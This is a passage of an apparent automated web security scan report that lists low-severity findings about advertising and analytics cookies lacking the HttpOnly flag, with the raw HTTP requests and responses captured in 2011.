Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26621_21556_1478501671=559-1; PMDTSHR=cat:; PUBMDCID=1; pubfreq_26621_21557_1797109372=921-1; KTPCACOOKIE=YES; __qca=P0-585104895-1317606788364

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:53:07 GMT
Content-Length: 1550
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:53:07 GMT; path=/
Set-Cookie: pubfreq_26621_21556_427351122=207-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:33:07 GMT; path=/

document.write('<div id="http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame12662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top:
...[SNIP]...

14.207. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21557&kadwidth=728&kadheight=90&kbgColor=FFFFFF&ktextColor=000000&klinkColor=008EB7&pageURL=http://www.igougo.com/about/&frameName=http_www_igougo_comaboutkomli_ads_frame12662026621&kltstamp=2011-9-2%2020%3A52%3A57&ranreq=0.7452815969008952&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=0x47&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; PUBMDCID=1; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:52:54 GMT
Content-Length: 1734
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:52:54 GMT; path=/
Set-Cookie: pubfreq_26621=; domain=pubmatic.com; expires=Wed, 05-Oct-2011 01:52:54 GMT; path=/
Set-Cookie: pubtime_26621=TMC; domain=pubmatic.com; expires=Tue, 04-Oct-2011 01:52:54 GMT; path=/
Set-Cookie: pubfreq_26621_21557_1687682837=559-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:32:54 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 01:52:54 GMT; path=/

document.write('<div id="http_www_igougo_comaboutkomli_ads_frame12662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=/GcAAP1nAAA1VAAAAAA
...[SNIP]...

14.208. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:11 GMT
Content-Length: 1710
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:11 GMT; path=/
Set-Cookie: pubfreq_26072_21044_1115692444=823-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:11 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAAAAAAAAAAAAAAAAAAA
...[SNIP]...

14.209. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21556&kadwidth=300&kadheight=250&kadNetwork=6&prevkadIds=21556_21556&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame32662026621&kltstamp=2011-9-2%2020%3A53%3A13&ranreq=0.44594317954033613&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26621_21556_1478501671=559-1; PMDTSHR=cat:; pubfreq_26621_21557_1797109372=921-1; __qca=P0-585104895-1317606788364; pubfreq_26621_21556_427351122=207-1; PUBMDCID=1; pubfreq_26621_21556_1914588461=6-1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:53:09 GMT
Content-Length: 1392
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:53:09 GMT; path=/
Set-Cookie: pubfreq_26621_21556_126284783=921-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:33:09 GMT; path=/

document.write('<div id="http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame32662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top:
...[SNIP]...

14.210. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21557&kadwidth=728&kadheight=90&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21557/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags266202662121557559adtag_htmlkomli_ads_frame12662026621&kltstamp=2011-9-2%2020%3A53%3A3&ranreq=0.2315859266091138&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21557/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PUBMDCID=1; pubfreq_26621_21556_1478501671=559-1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:53:00 GMT
Content-Length: 1389
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:53:00 GMT; path=/
Set-Cookie: pubfreq_26621_21557_1797109372=921-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:33:00 GMT; path=/

document.write('<div id="http_ads_pubmatic_comHostedDefaultTags266202662121557559adtag_htmlkomli_ads_frame12662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top:
...[SNIP]...

14.211. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A13%3A24&ranreq=0.780912266112864&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; pubfreq_26072=823-3:1098-3; PUBMDCID=1; _curtime=1317600804; camfreq_126550188=3663-1_1317687204; pubfreq_26072_21043_618709548=243-1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; DPPIX_ON=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1905
Date: Mon, 03 Oct 2011 00:14:52 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:14:52 GMT; path=/
Set-Cookie: _curtime=1317600892; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:24:52 GMT; path=/
Set-Cookie: camfreq_1175871307=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:54:52 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:14:52 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAATw4AABEdAAAAAAAAA
...[SNIP]...

14.212. http://statse.webtrendslive.com/dcs0sd6z700000cpbndecaa4f_6n9k/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcs0sd6z700000cpbndecaa4f_6n9k/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs0sd6z700000cpbndecaa4f_6n9k/dcs.gif?&dcsdat=1317599885976&dcssip=www.barclayswealth.com&dcsuri=/international/foreign-exchange-affiliates.htm&dcsqry=%3FWT.mc_ID=DISP_Premiership_080711&dcsref=http://cdn.flashtalking.com/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf&WT.co_f=50.23.123.106-4086325760.30173190&WT.vtid=50.23.123.106-4086325760.30173190&WT.vtvs=1317599886010&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=18&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Your%20passport%20to%20the%20world%20of%20foreign%20currency%20-%20Banking%20and%20Cards%20-%20International%20-%20Barclays%20Wealth&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1074x906&WT.fv=10.3&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.barclayswealth.com/international/foreign-exchange-affiliates.htm&WT.sp=wealthitnl&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=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-

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 23:58:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=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-; path=/; expires=Wed, 29-Sep-2021 23:58:14 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

14.213. http://tag.admeld.com/id

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /id

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /id?redirect=http://cas.criteo.com/delivery/admeld_map?match=[admeld_user_id] HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true; __qca=P0-273080792-1316409083560

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: http://cas.criteo.com/delivery/admeld_map?match=4ec87822-8f33-4202-954a-f6f06a37734b
Content-Length: 268
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 02 Oct 2011 23:49:01 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://cas.criteo.com/delivery/admeld_map?match
...[SNIP]...

14.214. http://tag.admeld.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?admeld_adprovider_id=8&_segment=2%7CPpAVCxNh2PJr%7CGNCT1.16008%7CMIWO2.15840%7CBMBN1.15744%7CEHEX1.15624%7CFACO1.15576%7CSMTC1.15456%7CEMON2.15360 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/drts?Rand=Nqa98l0hyRhM
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true; __qca=P0-273080792-1316409083560; meld_sess=4ec87822-8f33-4202-954a-f6f06a37734b

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 35
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:49:54 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

GIF89a.......,.................D..;

14.215. http://tag.contextweb.com/TagPublish/GetAd.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538936&ct=106934&cn=1&epid=&esid=&cf=300X250&rq=1&dw=1074&cwu=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHeadlines%2F0%2C%2C12306%7E2469333%2C00.html&cwr=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHome%2F0%2C%2C12306%2C00.html&mrnd=96724040&if=0&tl=1&pxy=238,508&cxy=1074,906&dxy=1074,906&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/300
Content-Type: application/x-javascript;charset=utf-8
